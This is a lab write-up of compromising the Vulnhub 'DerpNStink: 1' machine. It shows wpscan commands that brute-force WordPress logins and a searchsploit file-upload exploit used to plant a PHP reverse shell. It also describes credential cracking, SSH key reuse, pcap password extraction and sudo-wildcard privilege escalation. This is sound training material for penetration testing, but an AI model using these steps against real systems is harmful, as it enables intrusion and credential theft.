Vulnhub - DERPNSTINK: 1
Mr. Derp and Uncle Stinky are two system administrators who are starting their own company, DerpNStink. Instead of hiring qualified professionals to build up their IT landscape, they decided to hack together their own system which is almost ready to go live…
This box is on the NetSecFocus Admin list of OSCP-like machines. It’s DERPNSTINK: 1 from vulnhub. It’s got a Southpark theme, although it’s not overpowering (which I really appreciate) and I haven’t seen the episode so I don’t get the reference.
This box has FTP, SSH and HTTP on the standard ports (21, 22 and 80).
We have no anonymous access. Moving on…
Robots.txt gives two disallowed entries; /php and /temporary. So we have a hint the server may be running PHP. The /php directory gives a 403, and the /temporary directory suggests we try harder!.
The page source on the webroot refers to /webnotes/info.txt, which says
@stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live
So maybe we have a username. Going back out to webnotes, we get:
[stinky@DeRPnStiNK /var/www/html ]$ whois derpnstink.local Domain Name: derpnstink.local
And some other similar stuff - so we definitely have a user called stinky and a domain called derpnstink.local. I add it to /etc/hosts.
Gobuster on /php turns up phpMyAdmin. So that’s interesting, but we’ll come back to it. We also find weblog in the webroot, which is the blog the earlier comment referred to. It’s running Wordpress, so let’s try wpscan:
root@kali:/opt/vulnhub/derpnstink# wpscan -e --url http://derpnstink.local/weblog
This turns up two users: unclestinky and admin. A password attack:
root@kali:/opt/vulnhub/derpnstink# wpscan --url http://derpnstink.local/weblog -U 'unclestinky,admin' -P /usr/share/seclists/Passwords/probable-v2-top12000.txt
quickly yields admin:admin, but nothing for unclestinky.
Logging in, our ‘admin’ user is not actually an administrator.
wpscan also revealed a plugin - Slideshow Gallery 1.4.6 - which has an arbitrary file upload vulnerability. I mirror the python script from searchsploit and run it:
root@kali:/opt/vulnhub/derpnstink# python 34681.py -t http://derpnstink.local/weblog -u admin -p admin -f sh33l.php
Where sh33l.php is the pentestmonkey PHP reverse shell. It’s found at
And gives back a shell as www-data.
On the box
Enumeration with linpeas suggests the box probably should be vulnerable to multiple kernel exploits but I try a few quickly and they fail.
It also gives us the credentials for mysql:
This looks like it is probably a dead end, but we try it in phpMyAdmin and it works. We can grab the hash from the wp-users table:
I crack this in Hashcat on my Windows host machine:
With this, we can su to the stinky account.
Enumerating stinky we can find an SSH private key:
And once we copy the contents and chmod 600 we can SSH in as stinky and leave our shell behind.
More enumeration reveals a pcap file; might be interesting?
Digging through this, we can find a password for the mrderp user:
And with that, we can su as mrderp.
The final privesc to root is perhaps the easiest - binaries in /home/mrderp/binaries/ named derpyNAME can be run as root. We already knew this from a file stored on the server in /support called troubleshooting.txt:
On one particular machine I often need to run sudo commands every now and then. I am fine with entering password on sudo in most of the cases.
However i dont want to specify each command to allow
How can I exclude these commands from password protection to sudo?
Thank you for contacting the Client Support team. This message is to confirm that we have resolved and closed your ticket.
Please contact the Client Support team at https://pastebin.com/RzK9WfGw if you have any further questions or issues.
Thank you for using our product.
Visting https://pastebin.com/RzK9WfGw we find this:
mrderp ALL=(ALL) /home/mrderp/binaries/derpy*
Let’s confirm that now:
I haven’t encountered this exact scenario before - let’s try making a copy of bash.
And that was the end of derpnstink. Quite a few steps involved, and it was pretty good - thumbs up Bryan Smith.